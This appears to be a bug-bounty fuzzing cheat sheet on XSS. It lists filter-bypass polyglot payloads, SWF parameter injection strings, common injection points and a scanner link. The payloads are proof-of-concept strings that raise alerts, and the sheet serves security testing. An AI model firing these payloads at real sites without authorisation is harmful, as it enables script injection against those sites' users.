Tactical Fuzzing

XSS

Core idea : Does the page functionality display  something to the  users?

XSS payload

'Multi Context , filter bypass based polyglot payload
Rsnake XSS Cheat Sheet


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Payload 2

Multi-context; filter bypass based polyglot payload #2
Ashar Javed

https://github.com/jhaddix/tbhm/blob/master/05_XSS.md



~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg"> 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Payload 3


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



Polyglot #4


    
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
jaVasCript:/*-/*`/*\`/*'/*"/*%0A%0a*/(/* */oNcliCk=alert() )//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3ciframe/<iframe/oNloAd=alert()//>\x3e
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Other XSS Observation:

Customizable Themes & Profiles via CSS
Enter or meeting names
URI Based
Imported from a 3rd party (think facebook integration)
JSON POST Values (check returning content type)
File Upload names
Uploaded file (swf, HTML,++)
Custom error pages
fake params - ?realparam=1&foo=bar'+alert(/XSS/)+'
Login and Forgot password forms


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SWF Parameter XSS
( Almost everyone XSS + RFI)

Common params

onload
allowedDomain
movieplayer
xmlPath
enenthadler
callback
(more on the OWASP page)

Common Injection strings


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
%22})))}catch(e){alert(document.domain);}//

"]);}catch(e){}if(!self.a)self.a=!alert(document.domain);//

"a")(({type:"ready"}));}catch(e){alert(1)}//

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



AUTOMATED SWF Scanner

FlashBang
https://github.com/cure53/Flashbang

